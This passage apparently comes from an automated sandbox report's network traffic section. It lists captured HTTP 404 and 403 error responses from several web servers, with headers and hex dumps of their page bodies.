74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Mon, 13 Feb 2023 18:02:18 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:02:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: SESSION=e7720c88-3b8f-48bf-b911-e0d42371c8c7; Path=/; HttpOnly; SameSite=LaxContent-Encoding: gzipData Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 4b 8f e3 44 10 3e 67 7e 45 e3 d5 68 67 20 1e 3b 99 64 1e 1e 27 52 9e bb 21 3b c9 ce e4 b1 64 10 87 8e dd b1 5b b1 dd a6 dd ce 63 56 48 2b 0e 88 0b 07 6e 48 3c 24 38 71 41 e2 b2 d2 0a c4 af 61 22 e0 5f d0 dd 76 66 3c 68 58 41 12 3b ee aa ea aa af be 2a 57 9b ef 34 fb 8d e1 e4 79 0b 3c 1d 9e 3f 03 cf 47 f5 67 9d 06 50 54 4d 7b 71 d8 d0 b4 e6 b0 99 28 4a 07 7a 01 0c 29 0c 22 cc 30 09 a0 a7 69 ad 9e 52 dd 31 5d e6 7b e2 0f 41 bb ba 93 33 7d c4 20 70 19 0b 55 f4 71 8c 17 15 a5 41 02 86 02 a6 0e d7 21 52 80 95 ac 2a 0a 43 2b a6 89 bd 67 c0 72 21 8d 10 ab 8c 86 6d f5 44 01 5a 75 07 f0 8f c9 30 f3 50 b5 a4 97 d4 3f 7e fb 72 f3 ed ab 9b 37 5f 6c 7e fa 6a f3 cd 8f a6 96 a8 76 72 db 78 01 f4 51 45 a1 64 4a 58 94 89 11 90 19 f1 3c b2 e4 30 1f 00 16 52 e8 f8 f0 9e b9 6a 41 cb 45 0f 9b 4b 95 2a f0 53 e2 fd e7 5d 68 15 62 8a b2 a0 f4 87 dd cf d1 7a 49 a8 9d b5 4c 45 85 7c fa 50 dc 3e 1c 3e ec c2 46 91 45 71 28 ca 93 c1 37 74 71 04 f8 cf 5f 83 10 3a 32 39 ce 46 c4 d6 9c dc 9d 5c ee dd 97 fc 96 f3 21 75 70 60 e8 67 62 11 42 db c6 81 93 ac 3e e1 92 29 b1 d7 d2 6c c6 b3 57 67 d0 c7 de da 00 8f 6b b1 8d c9 12 db e8 71 1e 58 31 8d f0 02 e5 01 a4 18 7a 79 e0 22 6f 81 18 b6 60 1e 44 bc 67 d4 08 51 3c 93 de a7 d0 9a 3b 94 c4 81 6d c4 d4 db b3 21 83 06 f6 39 32 2d 0c 9c b3 29 8c d0 51 29 8f c7 f5 fe e5 52 ef 3e 71 48 8d 7f 7a 83 91 db 1a 39 e2 51 ae bb 8d da 84 3f 37 7a e7 d1 7b a7 42 3a 6a 79 ad 8b f1 c5 64 5c ec cd 27 4f 6a cb 7a dc bd be a8 2d 9b 9d 66 a9 43 3a ce aa 83 e7 b5 f3 ab 56 81 5c e2 1a ad 37 ed ab fa a0 77 de f9 80 bc 8f db d3 e6 d5 a4 d9 b5 06 7e a3 3f c1 7e 33 ee 0d c6 dd ce f5 65 6f 42 47 93 7e 3b be 70 96 88 5c 4d 3b 64 e5 10 c4 83 5b b5 96 35 7f 51 28 3c 1d 0f 67 96 08 5d 1b 8c c6 fd cb 6e b9 31 e9 74 2a fb 80 a2 10 41 f6 8f 4c 79 db 78 84 1a 8f 8a 05 f1 95 ca 44 b2 74 31 43 72 2d a9 8d f0 35 32 40 e1 24 5c 49 59 5a 08 95 b7 35 23 be 51 d4 13 b9 28 c9 01 a2 94 50 ee d7 46 2f 45 cd ee 57 a6 41 11 0a 23 86 e8 ff aa 4c 06 42 51 4f 63 e5 12 9c e0 0e 68 2a a0 ce 14 ee 15 cb e5 3c b8 bb e9 07 a7 27 fb 12 39 ef 0a e6 1a a0 ac ef ca a5 78 d9 55 e8 61 27 30 00 c5 8e 9b f0 93 34 9d ca 48 c8 2d 33 86 91 0b 6d b2 e4 b2 70 25 2f 37 f2 f6 f4 3c d0 77 45 ac dd 24 c0 cc 23 90 19 c0 43 33 e9 4b 52 12 10 de 9c a2 b1 24 23 29 84 d2 71 e2 39 dd f0 d6 e8 19 02 ca ff 9a bf cc 65 0b b1 c8 21 8a 4b 40 cd c0 3c 2a a4 30 b7 15 94 39 1e 67 eb 67 79 08 d2 a4 74 32 95 80 04 49 23 48 85 c1 4b ee 0a ea 64 62 e9 d0 94 d6 19 2a 2d 3e 56 11 15 56 39 0f 07 48 75 91 a0 d6 00 87 99 38 38 08 63 f6 21 e3 b3 b7 22 76 7e 24 7d 4c f9 a0 41 d4 90 88 8b a5 e3 3c 38 39 e5 dc 1e 17 77 f7 41 44 3c 6c 83 42 da 80 24 66 c2 b3 01 6e d1 6d 67 83 cc f8 30 35 cb f0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:02:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: SESSION=1fce4719-f864-4d77-9014-2d4ddd297388; Path=/; HttpOnly; SameSite=LaxContent-Encoding: gzipData Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 4b 8f e3 44 10 3e 67 7e 45 e3 d5 68 67 20 1e 3b 99 64 1e 1e 27 52 9e bb 21 3b c9 ce e4 b1 64 10 87 8e dd b1 5b b1 dd a6 dd ce 63 56 48 2b 0e 88 0b 07 6e 48 3c 24 38 71 41 e2 b2 d2 0a c4 af 61 22 e0 5f d0 dd 76 66 3c 68 58 41 12 3b ee aa ea aa af be 2a 57 9b ef 34 fb 8d e1 e4 79 0b 3c 1d 9e 3f 03 cf 47 f5 67 9d 06 50 54 4d 7b 71 d8 d0 b4 e6 b0 99 28 4a 07 7a 01 0c 29 0c 22 cc 30 09 a0 a7 69 ad 9e 52 dd 31 5d e6 7b e2 0f 41 bb ba 93 33 7d c4 20 70 19 0b 55 f4 71 8c 17 15 a5 41 02 86 02 a6 0e d7 21 52 80 95 ac 2a 0a 43 2b a6 89 bd 67 c0 72 21 8d 10 ab 8c 86 6d f5 44 01 5a 75 07 f0 8f c9 30 f3 50 b5 a4 97 d4 3f 7e fb 72 f3 ed ab 9b 37 5f 6c 7e fa 6a f3 cd 8f a6 96 a8 76 72 db 78 01 f4 51 45 a1 64 4a 58 94 89 11 90 19 f1 3c b2 e4 30 1f 00 16 52 e8 f8 f0 9e b9 6a 41 cb 45 0f 9b 4b 95 2a f0 53 e2 fd e7 5d 68 15 62 8a b2 a0 f4 87 dd cf d1 7a 49 a8 9d b5 4c 45 85 7c fa 50 dc 3e 1c 3e ec c2 46 91 45 71 28 ca 93 c1 37 74 71 04 f8 cf 5f 83 10 3a 32 39 ce 46 c4 d6 9c dc 9d 5c ee dd 97 fc 96 f3 21 75 70 60 e8 67 62 11 42 db c6 81 93 ac 3e e1 92 29 b1 d7 d2 6c c6 b3 57 67 d0 c7 de da 00 8f 6b b1 8d c9 12 db e8 71 1e 58 31 8d f0 02 e5 01 a4 18 7a 79 e0 22 6f 81 18 b6 60 1e 44 bc 67 d4 08 51 3c 93 de a7 d0 9a 3b 94 c4 81 6d c4 d4 db b3 21 83 06 f6 39 32 2d 0c 9c b3 29 8c d0 51 29 8f c7 f5 fe e5 52 ef 3e 71 48 8d 7f 7a 83 91 db 1a 39 e2 51 ae bb 8d da 84 3f 37 7a e7 d1 7b a7 42 3a 6a 79 ad 8b f1 c5 64 5c ec cd 27 4f 6a cb 7a dc bd be a8 2d 9b 9d 66 a9 43 3a ce aa 83 e7 b5 f3 ab 56 81 5c e2 1a ad 37 ed ab fa a0 77 de f9 80 bc 8f db d3 e6 d5 a4 d9 b5 06 7e a3 3f c1 7e 33 ee 0d c6 dd ce f5 65 6f 42 47 93 7e 3b be 70 96 88 5c 4d 3b 64 e5 10 c4 83 5b b5 96 35 7f 51 28 3c 1d 0f 67 96 08 5d 1b 8c c6 fd cb 6e b9 31 e9 74 2a fb 80 a2 10 41 f6 8f 4c 79 db 78 84 1a 8f 8a 05 f1 95 ca 44 b2 74 31 43 72 2d a9 8d f0 35 32 40 e1 24 5c 49 59 5a 08 95 b7 35 23 be 51 d4 13 b9 28 c9 01 a2 94 50 ee d7 46 2f 45 cd ee 57 a6 41 11 0a 23 86 e8 ff aa 4c 06 42 51 4f 63 e5 12 9c e0 0e 68 2a a0 ce 14 ee 15 cb e5 3c b8 bb e9 07 a7 27 fb 12 39 ef 0a e6 1a a0 ac ef ca a5 78 d9 55 e8 61 27 30 00 c5 8e 9b f0 93 34 9d ca 48 c8 2d 33 86 91 0b 6d b2 e4 b2 70 25 2f 37 f2 f6 f4 3c d0 77 45 ac dd 24 c0 cc 23 90 19 c0 43 33 e9 4b 52 12 10 de 9c a2 b1 24 23 29 84 d2 71 e2 39 dd f0 d6 e8 19 02 ca ff 9a bf cc 65 0b b1 c8 21 8a 4b 40 cd c0 3c 2a a4 30 b7 15 94 39 1e 67 eb 67 79 08 d2 a4 74 32 95 80 04 49 23 48 85 c1 4b ee 0a ea 64 62 e9 d0 94 d6 19 2a 2d 3e 56 11 15 56 39 0f 07 48 75 91 a0 d6 00 87 99 38 38 08 63 f6 21 e3 b3 b7 22 76 7e 24 7d 4c f9 a0 41 d4 90 88 8b a5 e3 3c 38 39 e5 dc 1e 17 77 f7 41 44 3c 6c 83 42 da 80 24 66 c2 b3 01 6e d1 6d 67 83 cc f8 30 35 cb f0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:02:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingSet-Cookie: SESSION=08a9e45f-f8a1-4452-b0a7-a7b8914c1d87; Path=/; HttpOnly; SameSite=LaxContent-Encoding: gzipData Raw: 34 34 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 55 4b 8f e3 44 10 3e 67 7e 45 e3 d5 68 67 20 1e 3b 99 64 1e 1e 27 52 9e bb 21 3b c9 ce e4 b1 64 10 87 8e dd b1 5b b1 dd a6 dd ce 63 56 48 2b 0e 88 0b 07 6e 48 3c 24 38 71 41 e2 b2 d2 0a c4 af 61 22 e0 5f d0 dd 76 66 3c 68 58 41 12 3b ee aa ea aa af be 2a 57 9b ef 34 fb 8d e1 e4 79 0b 3c 1d 9e 3f 03 cf 47 f5 67 9d 06 50 54 4d 7b 71 d8 d0 b4 e6 b0 99 28 4a 07 7a 01 0c 29 0c 22 cc 30 09 a0 a7 69 ad 9e 52 dd 31 5d e6 7b e2 0f 41 bb ba 93 33 7d c4 20 70 19 0b 55 f4 71 8c 17 15 a5 41 02 86 02 a6 0e d7 21 52 80 95 ac 2a 0a 43 2b a6 89 bd 67 c0 72 21 8d 10 ab 8c 86 6d f5 44 01 5a 75 07 f0 8f c9 30 f3 50 b5 a4 97 d4 3f 7e fb 72 f3 ed ab 9b 37 5f 6c 7e fa 6a f3 cd 8f a6 96 a8 76 72 db 78 01 f4 51 45 a1 64 4a 58 94 89 11 90 19 f1 3c b2 e4 30 1f 00 16 52 e8 f8 f0 9e b9 6a 41 cb 45 0f 9b 4b 95 2a f0 53 e2 fd e7 5d 68 15 62 8a b2 a0 f4 87 dd cf d1 7a 49 a8 9d b5 4c 45 85 7c fa 50 dc 3e 1c 3e ec c2 46 91 45 71 28 ca 93 c1 37 74 71 04 f8 cf 5f 83 10 3a 32 39 ce 46 c4 d6 9c dc 9d 5c ee dd 97 fc 96 f3 21 75 70 60 e8 67 62 11 42 db c6 81 93 ac 3e e1 92 29 b1 d7 d2 6c c6 b3 57 67 d0 c7 de da 00 8f 6b b1 8d c9 12 db e8 71 1e 58 31 8d f0 02 e5 01 a4 18 7a 79 e0 22 6f 81 18 b6 60 1e 44 bc 67 d4 08 51 3c 93 de a7 d0 9a 3b 94 c4 81 6d c4 d4 db b3 21 83 06 f6 39 32 2d 0c 9c b3 29 8c d0 51 29 8f c7 f5 fe e5 52 ef 3e 71 48 8d 7f 7a 83 91 db 1a 39 e2 51 ae bb 8d da 84 3f 37 7a e7 d1 7b a7 42 3a 6a 79 ad 8b f1 c5 64 5c ec cd 27 4f 6a cb 7a dc bd be a8 2d 9b 9d 66 a9 43 3a ce aa 83 e7 b5 f3 ab 56 81 5c e2 1a ad 37 ed ab fa a0 77 de f9 80 bc 8f db d3 e6 d5 a4 d9 b5 06 7e a3 3f c1 7e 33 ee 0d c6 dd ce f5 65 6f 42 47 93 7e 3b be 70 96 88 5c 4d 3b 64 e5 10 c4 83 5b b5 96 35 7f 51 28 3c 1d 0f 67 96 08 5d 1b 8c c6 fd cb 6e b9 31 e9 74 2a fb 80 a2 10 41 f6 8f 4c 79 db 78 84 1a 8f 8a 05 f1 95 ca 44 b2 74 31 43 72 2d a9 8d f0 35 32 40 e1 24 5c 49 59 5a 08 95 b7 35 23 be 51 d4 13 b9 28 c9 01 a2 94 50 ee d7 46 2f 45 cd ee 57 a6 41 11 0a 23 86 e8 ff aa 4c 06 42 51 4f 63 e5 12 9c e0 0e 68 2a a0 ce 14 ee 15 cb e5 3c b8 bb e9 07 a7 27 fb 12 39 ef 0a e6 1a a0 ac ef ca a5 78 d9 55 e8 61 27 30 00 c5 8e 9b f0 93 34 9d ca 48 c8 2d 33 86 91 0b 6d b2 e4 b2 70 25 2f 37 f2 f6 f4 3c d0 77 45 ac dd 24 c0 cc 23 90 19 c0 43 33 e9 4b 52 12 10 de 9c a2 b1 24 23 29 84 d2 71 e2 39 dd f0 d6 e8 19 02 ca ff 9a bf cc 65 0b b1 c8 21 8a 4b 40 cd c0 3c 2a a4 30 b7 15 94 39 1e 67 eb 67 79 08 d2 a4 74 32 95 80 04 49 23 48 85 c1 4b ee 0a ea 64 62 e9 d0 94 d6 19 2a 2d 3e 56 11 15 56 39 0f 07 48 75 91 a0 d6 00 87 99 38 38 08 63 f6 21 e3 b3 b7 22 76 7e 24 7d 4c f9 a0 41 d4 90 88 8b a5 e3 3c 38 39 e5 dc 1e 17 77 f7 41 44 3c 6c 83 42 da 80 24 66 c2 b3 01 6e d1 6d 67 83 cc f8 30 35 cb f0
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Feb 2023 18:02:33 GMTContent-Type: text/htmlContent-Length: 2007Connection: closeVary: Accept-EncodingSet-Cookie: SESSION=015e813f-7c1a-454d-87c0-5a9525539440; Path=/; HttpOnly; SameSite=LaxData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 2d e7 bd 91 e5 9d 80 e4 b8 8d e5 ad 98 e5 9c a8 3c 2f 74 69 74 6c 65 3e 0a 09 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 65 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 65 79 77 6f 72 64 31 2c 6b 65 79 77 6f 72 64 32 2c 6b 65 79 77 6f 72 64 33 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 69 73 20 6d 79 20 70 61 67 65 22 3e 0a 09 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 2a 7b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 30 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 41 75 64 69 6f 77 69 64 65 27 2c 20 63 75 72 73 69 76 65 2c 20 61 72 69 61 6c 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 41 6f 41 41 41 41 4b 43 41 59 41 41 41 43 4e 4d 73 2b 39 41 41 41 41 55 45 6c 45 51 56 51 59 56 32 4e 6b 59 47 41 77 42 75 4b 7a 51 41 77 44 49 44 34 49 6f 49 67 78 49 69 6b 41 4d 5a 45 31 6f 52 69 41 72 42 44 64 5a 42 53 4e 4d 49 58 6f 4a 69 46 62 44 5a 59 44 4b 63 53 6d 43 4f 59 69 6d 44 75 4e 53 56 4b 49 7a 52 4e 59 72 55 59 4f 46 75 51 67 77 65 6f 5a 62 49 6f 78 67 6f 65 6f 41 41 63 41 45 63 6b 57 31 31 48 56 54 66 63 41 41 41 41 41 53 55 56 4f 52 4b 35 43 59 49 49 3d 29 20 72 65 70 65 61 74 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 32 31 32 31 3b 0a 09 09 09 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 13 Feb 2023 18:02:41 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddenserver: openresty/1.13.6.1date: Mon, 13 Feb 2023 18:02:46 GMTcontent-type: text/htmlcontent-length: 175x-fail-reason: Bad Actorconnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.0.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://dachmotors.com/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 13 Feb 2023 18:04:28 GMTserver: LiteSpeedData Raw: 63 62 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5b 5b 73 db b6 12 7e ae 7f 05 cc cc b1 c9 16 a4 48 4a 94 64 3a 74 a6 4d d3 a7 f6 f4 4c 2f 4f 71 e6 0c 44 ae 28 24 14 c9 02 90 64 1f d5 ff fd 0c 40 4a bc 88 ba 58 4a 3d 13 47 04 76 bf 6f b1 bb 58 e2 22 bf bd 8e b2 50 3c e7 80 66 62 9e 3c 5c bd 95 ff a1 84 a4 71 a0 41 6a fe f9 bb 26 db 80 44 0f 57 df bc 9d 83 20 28 9c 11 c6 41 04 da 9f 7f fc 64 8e b5 87 ab 6f ca 8e 94 cc 21 d0 96 14 56 79 c6 84 86 c2 2c 15 90 8a 40 5b d1 48 cc 82 08 96 34 04 53 3d 60 44 53 2a 28 49 4c 1e 92 04 02 47 c2 bc 4d 68 fa 05 31 48 02 2d 67 d9 94 26 a0 a1 19 83 69 a0 cd 84 c8 b9 df eb c5 f3 